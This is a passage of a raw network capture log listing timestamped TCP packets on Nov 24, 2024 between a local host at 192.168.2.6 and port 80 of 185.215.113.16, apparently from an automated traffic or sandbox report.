                                                                                                                                                                                              Nov 24, 2024 13:39:26.918652058 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:26.918670893 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:26.918694019 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:26.918720961 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.039161921 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.048398972 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.048424959 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.048476934 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.089396954 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.128979921 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.129009962 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.129115105 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.133100033 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.133223057 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.133299112 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.141448021 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.141524076 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.141586065 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.149990082 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.150100946 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.150171995 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.158227921 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.158289909 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.158349037 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.166595936 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.166695118 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.166743040 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.174974918 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.175038099 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.175120115 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.183404922 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.183470964 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.183533907 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.191880941 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.191953897 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.192070007 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.200217962 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.200263023 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.200364113 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.208689928 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.261245966 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.301050901 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.301115036 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.301170111 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.305269003 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.339545012 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.339662075 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.339680910 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.342000961 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.342057943 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.342107058 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.347095013 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.347146988 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.347238064 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.352322102 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.352356911 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.352375984 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.357172012 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.357223034 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.357234001 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.362234116 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.362303972 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.362346888 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.367307901 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.367357969 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.367399931 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.372596025 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.372615099 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.372651100 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.377507925 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.377558947 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.377588987 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.382728100 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.382810116 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.382816076 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.389322996 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.389394999 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.389475107 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.392658949 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.392719030 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.392724991 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.398221016 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.398288965 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.399338961 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.404556990 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.404592037 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.404628992 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.412774086 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.412870884 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.412888050 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.412936926 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.412986994 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.413019896 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.418014050 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.418055058 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.418070078 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.423073053 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.423126936 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.423202991 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.428225994 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.428261995 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.428281069 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.433645010 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.433743000 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.433768034 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.438262939 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.438332081 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.511661053 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.511719942 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.511977911 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.514189005 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.514317036 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.514383078 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.519197941 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.549954891 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.550064087 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.550122023 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.551870108 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.551933050 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.551992893 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.557260036 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.557341099 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.557569027 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.563277006 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.563333988 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.563342094 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.566801071 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.566827059 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.566936970 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.568535089 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.568581104 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.568624020 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.570090055 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.570149899 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.570478916 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.571959019 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.572011948 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.572017908 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.573791027 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.573842049 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.573843002 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.575885057 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.575927019 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.575934887 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.577502966 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.577631950 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.577640057 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.579453945 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.579516888 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.579528093 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.581742048 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.581799984 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.581851959 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.584014893 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.584069014 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.584132910 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.586385965 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.586441994 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.586508036 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.588604927 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.588679075 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.588721037 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.590868950 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.590928078 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.590995073 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.596982956 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.597017050 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.597052097 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.597074032 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.597153902 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.597240925 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.599459887 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.599515915 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.599639893 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.601494074 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.601528883 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.601555109 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.603972912 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.604028940 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.604166985 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.606146097 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.606179953 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.606200933 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.608618021 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.608704090 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.608787060 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.610481024 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.610515118 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.610541105 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.651890993 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.723459005 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.723649025 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.723721981 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.724842072 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.724878073 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.724927902 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.727045059 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.727080107 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.727130890 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.729203939 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.729406118 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.729460001 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.731697083 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.731873035 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.731921911 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.762242079 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.762267113 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.762367964 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.763274908 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.763628960 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.763678074 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.765049934 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.765604019 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.765651941 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.767671108 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.767855883 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.767901897 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.770016909 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.770032883 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.770090103 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.770940065 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.770956039 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.771014929 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.774990082 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.775130033 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.775183916 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.776683092 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.776844978 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.776894093 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.778908968 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.779073954 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.779125929 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.781177998 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.781358004 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.781514883 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.783374071 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.783561945 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.783617973 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.785618067 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.785794973 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.785842896 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.787882090 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.788065910 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.788116932 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.789994955 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.790155888 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.790210009 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.792254925 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.792390108 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.792453051 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.794495106 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.794677973 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.794728041 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.796741962 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.796921015 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.796967030 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.799144983 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.799330950 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.799377918 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.801286936 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.801603079 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.801652908 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.803498030 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.803672075 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.803725004 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.805828094 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.805881977 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.805927992 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.807509899 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.807543993 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.807588100 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.808475971 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.808672905 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.808723927 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.814250946 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.814285994 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.814358950 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.815045118 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.815078974 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.815213919 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.816859961 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.817152977 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.817193985 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.819292068 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.819489956 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.819540024 CET4975280192.168.2.6185.215.113.16
                                                                                                                                                                                              Nov 24, 2024 13:39:27.821491957 CET8049752185.215.113.16192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:39:27.821769953 CET8049752185.215.113.16192.168.2.6
